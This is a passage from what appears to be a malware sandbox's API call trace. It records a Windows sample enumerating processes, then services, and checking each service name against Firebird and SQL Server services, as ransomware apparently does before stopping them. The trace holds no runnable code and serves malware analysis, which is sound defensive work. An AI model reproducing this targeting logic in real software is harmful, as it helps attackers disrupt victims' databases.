(lpString="svchost.exe") returned 11 [0054.521] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.522] lstrlenW (lpString="svchost.exe") returned 11 [0054.522] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.523] lstrlenW (lpString="svchost.exe") returned 11 [0054.523] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.524] lstrlenW (lpString="svchost.exe") returned 11 [0054.524] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.525] lstrlenW (lpString="svchost.exe") returned 11 [0054.525] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.526] lstrlenW (lpString="svchost.exe") returned 11 [0054.526] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.527] lstrlenW (lpString="spoolsv.exe") returned 11 [0054.527] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.527] lstrlenW (lpString="svchost.exe") returned 11 [0054.528] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.529] lstrlenW (lpString="svchost.exe") returned 11 [0054.529] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.530] lstrlenW (lpString="audiodg.exe") returned 11 [0054.530] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0054.531] lstrlenW (lpString="sihost.exe") returned 10 [0054.531] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.532] lstrlenW (lpString="svchost.exe") returned 11 [0054.532] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.533] lstrlenW (lpString="taskhostw.exe") returned 13 [0054.533] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0054.534] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0054.534] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0054.535] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0054.535] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.536] lstrlenW (lpString="explorer.exe") returned 12 [0054.536] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0054.536] lstrlenW (lpString="Memory Compression") returned 18 [0054.536] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0054.537] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0054.537] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0054.538] lstrlenW (lpString="SearchUI.exe") returned 12 [0054.538] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0054.539] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0054.539] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.540] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0054.540] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.540] lstrlenW (lpString="taskhostw.exe") returned 13 [0054.540] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0054.541] lstrlenW (lpString="UsoClient.exe") returned 13 [0054.541] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0054.542] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0054.542] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.543] lstrlenW (lpString="taskhostw.exe") returned 13 [0054.543] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0054.544] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0054.544] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0054.545] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0054.545] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0054.546] lstrlenW (lpString="msoia.exe") returned 9 [0054.546] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0054.547] lstrlenW (lpString="msoia.exe") returned 9 [0054.547] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0054.548] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0054.548] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0054.548] lstrlenW (lpString="screensaver.exe") returned 15 [0054.548] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0054.557] lstrlenW (lpString="xml upper.exe") returned 13 [0054.557] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0054.558] lstrlenW (lpString="defeat preston.exe") returned 18 [0054.558] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0054.559] lstrlenW (lpString="boss isolated.exe") returned 17 [0054.559] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0054.560] lstrlenW (lpString="member.exe") returned 10 [0054.560] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0054.561] lstrlenW (lpString="chubby-er.exe") returned 13 [0054.561] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0054.562] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0054.562] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0054.563] lstrlenW (lpString="organization.exe") returned 16 [0054.563] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0054.564] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0054.564] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0054.564] lstrlenW (lpString="spray-roman.exe") returned 15 [0054.564] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0054.565] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0054.565] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0054.566] lstrlenW (lpString="tank attacks.exe") returned 16 [0054.566] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0054.567] lstrlenW (lpString="wires jacket.exe") returned 16 [0054.567] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0054.568] lstrlenW (lpString="values.exe") returned 10 [0054.568] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0054.569] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0054.570] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0054.571] lstrlenW (lpString="printersaerospace.exe") returned 21 [0054.571] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0054.572] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0054.572] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0054.573] lstrlenW (lpString="dllhost.exe") returned 11 [0054.573] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0054.574] lstrlenW (lpString="joke.exe") returned 8 [0054.574] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0054.575] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0054.575] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0054.576] lstrlenW (lpString="documents.exe") returned 13 [0054.576] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0054.577] lstrlenW (lpString="rebel.exe") returned 9 [0054.577] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0054.578] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0054.578] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.579] lstrlenW (lpString="conhost.exe") returned 11 [0054.579] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.580] lstrlenW (lpString="conhost.exe") returned 11 [0054.580] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0054.580] lstrlenW (lpString="hgaibc.exe") returned 10 [0054.580] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0054.581] lstrlenW (lpString="cmd.exe") returned 7 [0054.581] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0054.582] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0054.582] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.583] lstrlenW (lpString="conhost.exe") returned 11 [0054.583] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.583] lstrlenW (lpString="conhost.exe") returned 11 [0054.584] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.584] lstrlenW (lpString="svchost.exe") returned 11 [0054.584] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0054.585] CloseHandle (hObject=0x320) returned 1 [0054.585] Sleep (dwMilliseconds=0x1f4) [0055.662] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ea98 [0055.662] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0055.662] GetLastError () returned 0xea [0055.662] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x636198 [0055.663] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x636198, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x636198, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0055.663] CloseServiceHandle (hSCObject=0x60ea98) returned 1 [0055.664] lstrlenW (lpString="Appinfo") returned 7 [0055.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0055.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0055.664] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0055.664] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0055.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0055.664] lstrlenW (lpString="AppXSvc") returned 7 [0055.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0055.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0055.664] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0055.664] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0055.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0055.664] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0055.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.664] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0055.664] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0055.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0055.664] lstrlenW (lpString="Audiosrv") returned 8 [0055.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0055.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0055.664] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0055.664] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0055.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0055.665] lstrlenW (lpString="BFE") returned 3 [0055.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0055.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0055.665] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0055.665] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0055.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0055.665] lstrlenW (lpString="BITS") returned 4 [0055.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0055.665] lstrcmpiW 